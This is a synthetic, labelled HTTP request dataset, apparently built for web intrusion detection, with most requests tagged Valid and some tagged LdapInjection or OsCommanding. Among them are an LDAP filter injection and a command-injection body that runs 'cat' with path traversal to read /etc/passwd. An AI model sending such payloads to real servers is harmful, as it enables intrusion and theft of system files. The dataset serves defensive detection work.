UA-Color: color32
UA-Pixels: 7210x634
Via: FTP/5.7 203.145.236.94, 9.7 www.xgakr.jpg
Transfer-Encoding: qylr; 7xiin=jt5i
Upgrade: sLskE/9.9, lm6o/6.1, toe1rq/3.0
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 048488269920
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9660
Start - Id: 13305
class: Valid
GET /cneeyI/h7q4.HmrS6wmPNtepcJf/pCmO4s..js?hhuextl=069451 HTTP/1.1
Host: www.EcgcEtv.biz
Connection: dpEi0oc1
Accept: */*
Accept-Charset: isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: Eejrbie-nhnieh;q=0.1, Weds-if;q=0.9, bnvi-sa;q=0.1
Cache-Control: max-age=046
Client-ip: 220.133.79.137
Cookie: ecwes=e;tdiltaw7eWddv=n;7ehinuageea=jagTeai5axtTse
Cookie2: $Version="82"
Date: Sun, 10 Aug 08 12:04:31 CET
ETag: W/"2a10JwxUEbJ0o0pe"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Fri, 02 Mar 07 13:32:11 UTC
If-Unmodified-Since: Mon, 09 Feb 09 17:28:30 UTC
If-Match: "TWGT5yb2CcEb3EUx"
If-None-Match: "u@8iXvg8xkUfAgIO3VYf"
If-Range: Wed, 26 Nov 08 02:44:56 GMT
Max-Forwards: 4875
MIME-Version: 8.4
Pragma: E=wa
Proxy-Authorization: NTLM ZW9hZXNVZUllMnBwU21zYWp0QU9oYXBybXNuRWVsY203dGg=
Authorization: Basic Um4ycW9sOnVtWXBlM3Q=
Range: -03890,359255-
Referer: http://tscnat.st/oine.tar
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: StnuyerD/3.6.1.9.6
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: elnnpi/5.8 104.190.20.140, 6.1 156.90.102.159, HTTP/4.2 204.3.148.94
Transfer-Encoding: compress
Upgrade: a4e/5.0
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 119.172.187.41
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13305
Start - Id: 34418
class: Valid
POST /gGdl/di/tsKOvJBG47NJDyaTLkyB/ahwreeGn4tvAbshErhB8/BpDaRipasswdZqEsqq/k87xsj6bhS@d/sk2AlNVF5dJFX5Qd/i@2i7EkA2AF5P3g9cwJ/imH90y6where7Zinsert6Y.cgi? HTTP/1.0
Content-Length: 270
Content-Language: lalm,onhh,oes
Content-Encoding: deflate
Content-Location: http://www.ac51n6.st/ztryas4.pdf
Content-MD5: ZGlob3l0cm1nc3dvMXZjVA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Oct 08 01:46:17 GMT
Last-Modified: Mon, 23 Feb 09 16:42:56 CET
Host: www.eOth1gHn.biz
Connection: lrakj
Accept: */*;q=0.3
Accept-Charset: utf-8;q=0.5, windows-1250, x-mac-greek, windows-874
Accept-Encoding: 
Accept-Language: hs6eam-ceeai, 9eu-Ye
Cache-Control: no-transform
Client-ip: 197.59.91.141
Cookie: nYq=cg
Cookie2: $Version="3"
Date: Sat, 19 Jan 08 10:43:44 UTC
ETag: W/"zHlokjeNLk-ETU_AXF"
Expect: 100-continue
From: xEN1@eBiq.org
If-Modified-Since: Sat, 31 Mar 07 05:02:47 UTC
If-Unmodified-Since: Fri, 17 Sep 04 24:29:36 GMT
If-Match: *
If-None-Match: *
If-Range: "i4Xo9I8RKaHHIPPhXG-"
Max-Forwards: 1281
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="91Ed0CCc3Fc4F1F67Ad2f1f551CE9C3F"
Authorization: NTLM bHQzZHRhVXRkMXNib3JhTTNzb2U5OXR6bWhlWmU5ZTQzTGw1cmw=
Range: 90-,-71
Referer: /telSd/ytexyx/ers9mmst.gif
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: If-Match
User-Agent: Mozilla/2.6 (compatible; MSIE 8.0; Solaris; 2snad)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 995x932
Via: 2.9 130.121.35.198:46
Transfer-Encoding: compress
Upgrade: ovAeer/6.4, irvwrQ/0.5, snd8l/4.6, ann/7.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 3756270
----: -----------
~~~~~: ~~~~~~~~~~~~~~

MconnectTformq@J=e1wenqbpbtafern&0oW3rl=yiil%29z%29t%7Enas29D&xay=s7vP&myubP=aciavOO6&ahrnxrcgs=p1kANbg&kkieossjamlmtt=tk4bnhi-.&iheuvperpRQa=HEi&LwX%uC9vL=6935&n5ihtNne=esdteb&dreeh=ee&et=798769&R-dalldMl=1&tRteopepd=e%3Eh%28+r%7Et-oPtap&sra=s+btUfwosamaWl8tl&n2cio=aRv

End - Id: 34418
Start - Id: 11932
class: Valid
GET /knulaoowafot9rEogs37.cgi?iehnheEs8pmda=642&tndrs=dto&rgooRade=3228242&trkat75ahl5eena=x6aanr8neens&Sesrai=5Hcosddl8&tosonr=481234&Q7RDcrBSjAameta=ptoe&K3p@tunhOeIH=cselecttianiat%5DNo&aN0sSeotdn0Ee=ovbd&fF_GW=rql&citofus5=3&7oEobaTrAdbe=+o6hi49meta5f HTTP/1.1
Host: 172.207.18.198
Connection: arnet
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=0171
Client-ip: 145.60.59.103
Cookie: teerogi=3DBsQPH4l2t;thsoTlos9l=130619
Cookie2: $Version="3"
Date: Mon, 13 Jul 09 23:35:15 GMT
ETag: "Z@_jrx68mt-s@PF5"
Expect: 100-continue
From: irNeted@t2hsetDwt.biz
If-Modified-Since: Fri, 08 Apr 05 18:01:43 CET
If-Unmodified-Since: Tue, 24 Aug 04 23:11:03 CET
If-Match: "ec_b_wK0fWxA003gz6gu"
If-None-Match: *
If-Range: "018ovzqwz950IKZ.t.I"
Max-Forwards: 211
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic VGRhdXZFOkNvdG1HYmk=
Authorization: Digest algorithm=8Tberie
Range: 1-,-240,665474-
Referer: /uhynrn/5TtK.html
TE: trailers
Trailer: If-Modified-Since
User-Agent: Eidnirexxrc5lo
UA-CPU: x86
UA-Disp: 4448,340,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: 1.7 239.74.105.15, 1.8 206.160.233.245
Transfer-Encoding: iRette
Upgrade: Nnz/1.5, iTsis/1.6
Warning: 588 243.230.142.177 "wa8laofak2j" 
X-Forwarded-For: 237.227.200.204
X-Serial-Number: 7861742222563
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 11932
Start - Id: 22608
class: Valid
GET /tV/hTPcX/oibkinehy.asp? HTTP/1.1
Host: www.yoie.uk
Connection: titerr
Accept: audio/basic
Accept-Charset: x-mac-korean;q=0.1, euc-cn;q=0.3, iso-8859-5, cp-950;q=0.2, utf-7;q=0.2
Accept-Encoding: deflate;q=0.5, identity;q=0.6, identity, compress;q=0.8
Accept-Language: s-igovseas;q=0.0, 7-oreP;q=0.1, sEceu-twlhc, 5-toozh
Cache-Control: nw='n'
Client-ip: 69.32.239.114
Cookie: 2eg=7975;beaOmtzmseaMrCN=tGrxMcvfi3q;sntanrtesji=j/n;dhetocyy3it=496;eat=4429103;Hehnamrdi9=30
Cookie2: $Version="62"
Date: Thu, 10 Feb 05 18:04:16 UTC
ETag: "SBLvx3V.@Glr-f1ZA"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Fri, 26 Sep 08 23:08:33 CET
If-Unmodified-Since: Thu, 14 Jul 05 12:36:18 GMT
If-Match: *
If-None-Match: *
If-Range: "v1_9WsvHFO30R0cU1x"
Max-Forwards: 121
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dTNpZWZzOElnanR5aWV3YXM1bHJlaHRtc2RyQzZzZGVvd3BpdHQ2emhsdA==
Authorization: 2aig icyQ3yn=lrewsm
Range: 5809-2058
Referer: /p0fe/odafs/cujrcue/3whrbO8e/rra7vdi.asp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.3 (compatible; heaSw; Mac OS X; leeas7ni)
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9598x757
Via: 7.7 236.221.151.144
Transfer-Encoding: compress
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 246.209.203.242
X-Serial-Number: 705834569346
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22608
Start - Id: 10506
class: Valid
GET /9utr/ltu5edpos1ajrcotddyt/tXPoAR8JEJvm/iM.4_1iop-OWmvM/IbV5tidservicesvf-iH1/8suz12sb3esp8roontCy/oP03Bjwo-/qgei/pQ@FAyTRfm70ahhSdLJ.png?55eV2j7hL=Tn9alj HTTP/1.0
Host: www.toioeiuAxe.fr:86319
Connection: close
Accept: audio/basic;q=0.5
Accept-Charset: iso-8859-15, cp-932, x-mac-korean, windows-1255;q=0.6, iso-8859-7
Accept-Encoding: identity, deflate, identity, gzip, deflate;q=0.2
Accept-Language: 7ioihaE-o;q=0.8, sx-e0, u-nme8t;q=0.0
Cache-Control: tpwtioE=a4eou
Client-ip: 178.0.226.137
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="6"
Date: Thu, 22 Nov 07 15:49:12 UTC
ETag: "eS5CQmeUESTw_j_"
Expect: 2gTdo
From: r1ahidt@tnaomtA.it
If-Modified-Since: Sun, 21 Jan 07 09:46:55 CET
If-Unmodified-Since: Wed, 29 Mar 06 05:10:49 UTC
If-Match: "z133QAMHV09qylinQ-FQ"
If-None-Match: ".W8t-0mLugb5RSBCk"
If-Range: *
Max-Forwards: 85
MIME-Version: 2.1
Pragma: 3oyst2='2'
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: Basic UnRvdjpnbjZIdHBkdQ==
Range: -11352
Referer: http://zhys0hp.it/rsq9weaq/9tvgbce/2lseeb/laesu.php4
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: ema11e/0.1.9.6
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4657x757
Via: 3.3 74.191.44.96, 8.6 212.17.106.245
Transfer-Encoding: gzip
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 364 17.253.249.140 "d4vHRriaUr2lxnus5tt" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 98147817279
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10506
Start - Id: 38162
class: LdapInjection
GET /nda2EdrAe/du@FCiGz3@D.4aGRy/EtehtoxaaNzaedev/3rraamtsai3T/bF/h61qTjBjw/mO2rYiJjIb_wO5n/ApPertRlntctt/tPGzAFKKAQYYfr0/qdbnFneott0arey/QXfbody9YMD_LBD7.pl?rtduiy2=k-EjeXiIK&nW@kCT7awinntgJ=NgrEPaselectin&drTsp9Stdcaysoa=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aasefurf=yIC%402SD_Zm6P&Arnab1nkfd2=tn5aeru&qoY6E3=eqos+copytGdropubydet&a7i=i%3B&QFeQOT74Sim=x-5gk7HD2A&jcmtpig=72657988&kf=75 HTTP/1.1
Host: 180.122.205.46:80
Connection: close
Accept: image/jpeg;q=0.6, video/*, video/quicktime
Accept-Charset: euc-cn;q=0.6, cp-950;q=0.5, euc-jp, iso-8859-4
Accept-Encoding: *;q=0.4
Accept-Language: vuder0-e7;q=0.0
Cache-Control: only-if-cached
Client-ip: 246.213.85.96
Cookie: maaBe=0547;nl=863688965;eIeOcuehdetaged=e
Cookie2: $Version="4"
Date: Thu, 30 Jul 09 18:44:31 CET
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sun, 04 Apr 10 11:00:57 CET
If-Unmodified-Since: Tue, 25 Nov 08 10:44:52 CET
If-Match: "1Ouy9-@oIfwoxEs"
If-None-Match: *
If-Range: Sat, 04 Mar 06 12:18:55 CET
Max-Forwards: 1916
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: tpps jstEan=UoplteL
Range: 8-,-63
Referer: /I4eeo/ctawna.jsp
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (compatible; Konqueror/0.5; Mac OS X; 5fw9; 4teeeO; azdirdl)
UA-CPU: PowerPC
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 8.3 www.p0rem.js, 6.7 www.reeecvIe.gif, HTTP/5.7 www.15nf.png:5020
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38162
Start - Id: 28494
class: Valid
GET /yrhryh3thie6aa/lhMt6JR/it8EmjFh9/ygHLFA0fjF/0loRehikog8rSw8emoa/dnScdda.msf?Rhs=gm9a_&rena=475964&biayNsieoi4un=868516&asnio2shdleaus=ereiw%28nvnw&avg=variitGfcn6e&Pd2zqf1g=ase5os6&lotnlrccj=zpacyOiframeImsreplace&mnhoolyxnaspe=5740526&ghS3e=623&adies=nD&%ufq_vYyVajQ=ctuia&evyi=tosposition&hna=04621 HTTP/1.1
Host: www.O6tkwfiy.cz:80
Connection: bSdhkaW
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: hUTat-e3gse, sn5-cab;q=0.7, xOxet-2nla2, en5u-Teyet;q=0.0, rr2t-gtPns;q=0.4
Cache-Control: lesKet=gDx7
Client-ip: 229.55.227.78
Cookie: nq0ge=5675;gqteHutenTa=erooa1iteowloE
Cookie2: $Version="794"
Date: Wed, 04 May 05 10:29:08 CET
ETag: "7v1k5OEHH1noZDlI186"
Expect: 100-continue
From: eSaii@Beribes6hy.fr
If-Modified-Since: Fri, 11 Jan 08 06:40:22 UTC
If-Unmodified-Since: Fri, 24 Mar 06 12:45:17 GMT
If-Match: "1@5fSMP-AwJXg6RLgYrY"
If-None-Match: "9aVQ.Q19klv1cnDX0qp"
If-Range: *
Max-Forwards: 9038
MIME-Version: 1.7
Pragma: enahe='oricoe'
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: NTLM b3BtaGluc2ltYXM1ZXJlY3RoZ2lyZGhpb2llczlhcnBxb3JwZWxkZXVz
Range: 342905-6,364-
Referer: http://www.x9uaDtnm.com/Yr4ec/Tufne3am/Iilabnil/8kjui/coity.sh
TE: gzip;q=0.5
Trailer: Connection
User-Agent: okdvnnk (gamG37UKX; h5Km3J@Ikn; cVAl3Nx@; iDYU7LfTY4)
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: 4.8 www.hdaDmufi.gif:4, 7.6 www.teodirmr.css:7237
Transfer-Encoding: deflate
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 98743
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28494
Start - Id: 12269
class: Valid
GET /pY@cAgLm/nML937/nFL/9tg3et89eta/lVic9PX/ejs/2zwxtQYwNItf/@VK2MXeEG3mIB5X.js?rleaauqeeErglen=d.wSK&X2hhMWjlogu=t9q+oMa&yniImy=aVHSNT HTTP/1.0
Host: www.eHlsr.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 25.238.251.73
Cookie: ri5noty9t=?sn9l;nhwfenqa=3Ee""iotcca9lLttunionu[;doreohteefi=f h
Cookie2: $Version="853"
Date: Sat, 20 May 06 16:03:01 GMT
ETag: W/"tmUEoi6Fuv73Ecr"
Expect: 100-continue
From: mrsqce6@taaxyAstme.com
If-Modified-Since: Mon, 18 Aug 08 14:35:41 GMT
If-Unmodified-Since: Wed, 21 Apr 04 16:25:40 UTC
If-Match: "qZNG.SW4dnSXg3xA8"
If-None-Match: *
If-Range: *
Max-Forwards: 9751
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest qop=gqmIiltu
Authorization: Digest realm
Range: 9688-4015,-4,45-
Referer: http://www.rdzeh.gov/oeMKh4/lonSNl/plaeM/ie4ts.pdf
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: ohana9inpt/8.2.5.5.6
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: HTTP/6.5 146.91.95.29
Transfer-Encoding: deflate
Upgrade: n4nimo/1.3, fylsl/9.0, tonay/8.4, utay/9.8
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12269
Start - Id: 16628
class: Valid
GET /j3PJ/senddo5dprje/ceaNZnWtr6htsih/RoIr1aoHg4/oq/dimgerP0KKSx/nU@P.jpeg?h1hthewi4tDslhN=+h++iff&isnsi0=%3B%3Cadeletec&Je=wVHrJn0d%40WL&@Z75iR=77giFHRr4EO&M1tebthoufti=agtaherhauewu&_x_6Mmaili0MYBn=ibo&hNbLosi=4738557&deoneu0hdo=a73oeatriroaedna&p6ortLrtuern=ae&nOecHcued52it=hd+t+&KXGwindow.open=nouhAnnasxn%27u&GyeI=hmuieop&S1Peval5I1OPisystem=14146078 HTTP/1.1
Host: www.Ntnip.biz
Connection: i7hssant
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress, gzip, gzip, gzip, deflate;q=0.9
Accept-Language: utepo-jai
Cache-Control: max-age=64
Client-ip: 180.147.224.253
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Tue, 21 Dec 04 13:27:48 UTC
ETag: "dZGwfeTA3U@pruMwOh"
Expect: 100-continue
From: NuRe@6eea.cz
If-Modified-Since: Fri, 14 Sep 07 17:54:55 GMT
If-Unmodified-Since: Wed, 26 Apr 06 06:49:53 GMT
If-Match: *
If-None-Match: "_Lh0KGs72e9Q0HG"
If-Range: Wed, 13 Feb 08 01:09:17 UTC
Max-Forwards: 21
MIME-Version: 2.1
Pragma: ceesbErc=Ho
Proxy-Authorization: ttdia rghriOx=i1agttb
Authorization: Digest algorithm=MD5
Range: -0
Referer: /urt1/otaeEoe/0m1ttc1e/Bid3d1A/oeeaxm4o.jpg
TE: gzip;q=0.4,chunked;q=0.7,deflate;q=0.6
Trailer: From
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 7.3; yt-aa; rv:0.8.7) Gecko/85056861
UA-CPU: MIPS
UA-Disp: 8189,4167,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 0.6 www.w8rhp5rn.gif
Transfer-Encoding: compress
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 128.243.180.188
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16628
Start - Id: 18780
class: Valid
GET /7Wgzt7TO/tror0sodl5qmhdlceaoa/r1nee/oUJswJk@ZCxs_QAKi/t9s5BA0L.QJDm1UR/H3/n0mw6WiZVFt/ler2seul0nizotehenea/jnanrosfn/h.fj/32QG6/oPBEc0_kJ.shtml? HTTP/1.0
Host: 108.180.18.90
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.7, iso-8859-8-i, iso-8859-6
Accept-Encoding: deflate, gzip, gzip;q=0.6, deflate, identity
Accept-Language: immI-x, temotht1-o8;q=0.2, tulx2-upn
Cache-Control: max-age=27
Client-ip: 83.62.14.82
Cookie: leoRdplaasdEcd=ho
Cookie2: $Version="85"
Date: Wed, 25 Oct 06 13:39:50 CET
ETag: W/"4SLIScoc66tTpmaa3"
Expect: DrnnfC=othwa
From: 1edeiie1@pdcnous.ch
If-Modified-Since: Mon, 13 Oct 08 01:18:04 GMT
If-Unmodified-Since: Tue, 17 May 05 20:52:07 CET
If-Match: *
If-None-Match: "5EL@Zc9czAknISbH32FQ"
If-Range: "tkbWGeerseq5GnRYX"
Max-Forwards: 5
MIME-Version: 6.5
Pragma: e='wo'
Proxy-Authorization: Digest uri=/1r5fAsr/ectssf/toia.doc
Authorization: Basic M2FkRXI6T3NpZ3Rxbw==
Range: 23-
Referer: /tnaa.jsp
TE: deflate;q=0.3,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/2.9 (X11; U; Unix 7.7; eu-hc; rv:1.3.7) Gecko/47586197
UA-CPU: Sparc
UA-Disp: 0379,370,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6403x795
Via: HTTP/2.8 www.mEsE9aph.jpg, 6.7 www.Siiw.shtml
Transfer-Encoding: compress
Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 003 www.Ooy6hd.tiff "oonlbt8n4cweMttbL" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18780
Start - Id: 10682
class: Valid
GET /Nnis/hjjBSgUc9yWAN5/oe2tRr9eoS3oEdpmso/uQreplaceab6UKallHBl/6rpv_PXegdQ3ToEIAg/ljLoKS8H82X0RJ5qap/acDaorhpei/aea/AAZQR2.sh?ouhee=weg%27k1iupdateesu+tyai+y&ifneehTebaozt8=p5iJe&4hscsShse1=+sat%28nallrbinpo%5Bcnixetl&elr=dhsw9N7 HTTP/1.1
Host: 120.55.14.160
Connection: 9qeae
Accept: image/*, text/*;q=0.5
Accept-Charset: windows-1253;q=0.5, x-mac-roman;q=0.9
Accept-Encoding: *
Accept-Language: feppiye-hrrhaml, pioh-m3kehaoi, Thudm-nitoo2s
Cache-Control: no-cache
Client-ip: 245.69.51.123
Cookie: wnzett2unaesps=70;t1ca=5;dSyae=gn4aeoitego;lt0l=44064813;iAruosel=ssr;q39SH_gcdlsM=rlhs
Cookie2: $Version="902"
Date: Thu, 06 Mar 08 11:41:29 UTC
ETag: "c7TaWn1qmplrGR5OVY"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Wed, 28 Nov 07 04:46:54 UTC
If-Unmodified-Since: Sun, 04 Nov 07 09:40:20 UTC
If-Match: *
If-None-Match: "B3v46AetD8T7Xymw."
If-Range: Thu, 26 Jun 08 20:23:24 GMT
Max-Forwards: 61
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: Digest username="eto0dso"
Range: 9268-2780
Referer: http://jfrte.biz/isdt.rar
TE: trailers,trailers,chunked;q=0.9
Trailer: Accept-Language
User-Agent: dccjs87OeUSsrrwdiY
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6678x842
Via: 4egihg/8.8 www.eulg8e.html:42
Transfer-Encoding: gzip
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 956 www.dDaes.jpg "taiUihonr" "Fri, 26 Nov 04 05:45:18 UTC"
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10682
Start - Id: 36699
class: OsCommanding
PUT /ue/he/awTlt3avvF949.4zzUD/9goeotj/a4RtJA/T3phHdNv5/Roet46sicqte2u/fMdH/ytfhsidcts/tfEt6rD/Xg9ZNCEZV-Nw-Q.mdb? HTTP/1.1
Content-Length: 154
Content-Language: id
Content-Encoding: gzip
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: amN0bnp0OWhjdGYyeUFzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 24:38:47 CET
Last-Modified: Thu, 06 Apr 06 24:01:12 GMT
Host: www.t8ndesqye.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-8, ks_c_5601-1987;q=0.8
Accept-Encoding: *
Accept-Language: intradse-sgt, nhC1nrtI-bmy
Cache-Control: only-if-cached
Client-ip: 24.6.250.56
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="6"
Date: Mon, 15 Oct 07 04:32:17 GMT
Expect: 7oiToetn
From: debomi@hLAy.be
If-Modified-Since: Sat, 21 Jun 08 05:05:00 GMT
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Fri, 20 Jun 08 18:43:53 UTC
Max-Forwards: 649
MIME-Version: 8.8
Pragma: hnon5s=d4o
Proxy-Authorization: Basic RWNlanNsNG46dGM3MHhv
Authorization: Digest username="lruyb"
Range: 426198-
Referer: /hcit8ea/be2s/rr7aau/tsuh1/eahat1s.gz
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: htacAsItauot6iatp0
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: deflate
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

vc=31451712&iar=rOu1RFORYnX&loda=|cat     ../../../../../../../etc/passwd    |&ki7=sdincludemae&obthTPUtwwdo=285141&isnlp=sMzBiRY&r9=B

End - Id: 36699
Start - Id: 15207
class: Valid
GET /oRpm_BDrGc/Ascript/dce/ijS1M/tuWaA_M95/X@link/ebSo1enC-rQm69qOLiJ.css?xe=O4rd%7Cacoaya&QM@bintmpZ6xJ=nlinkrfo&cT9a7trMt=eo%2B&FmiAvarkWSdEg=havingyp7&oiSin=mY1J.Z-m7a HTTP/1.1
Host: www.taCeitafi.be
Connection: hoa9i
Accept: */*
Accept-Charset: windows-1252, x-mac-greek;q=0.4, iso-2022-jp
Accept-Encoding: deflate, identity, compress, identity;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 170.95.234.195
Cookie: 7i9e=ssn;tiu=efI7s5ol02;rSwmtodb=q1lfd
Cookie2: $Version="8"
Date: Mon, 15 Jun 09 19:36:20 CET
ETag: W/"7yo89CHD6XfuTx0"
Expect: 100-continue
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Thu, 29 Nov 07 14:52:35 GMT
If-Unmodified-Since: Sat, 09 Apr 05 18:36:56 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Jul 09 22:37:10 GMT
Max-Forwards: 943
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 2oKd dti7nal=t6ihpnaA
Range: 85-,65506-76
Referer: /ehhaw.swf
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: rNXtFImC5W http://www.eehdf6.fr
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1443x630
Via: 3.6 231.1.56.174, 6.3 150.188.190.171:854, 7.5 214.124.169.237
Transfer-Encoding: identity
Upgrade: bcdD/5.6, SOfeT/0.6, d9O/4.6
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 66124683
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15207
Start - Id: 27467
class: Valid
GET /8crIE/2Jkn/dakmEOp/fobjectF/soebiUtyubellt/unOe@Icq/idtihtb1trktmilx8bi/sinkiwikn2tsg.cfm?vozhyshtbtw28N=38&9erglnsnlI=6&VgAN6hMND=na HTTP/1.0
Host: www.Icn7b.ch:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip;q=0.0, compress;q=0.6, gzip;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-stale=8076
Client-ip: 192.198.232.188
Cookie: tiinRzan=iJH;7hetnoc60EaoDa=0;s7=140355;eelea=pE14R-hd;ei9nds=exhsexecssirhttpnrt
Cookie2: $Version="253"
Date: Fri, 13 Jun 08 13:53:35 CET
ETag: W/"Bdp2xEssGZ3t@BbKey.7"
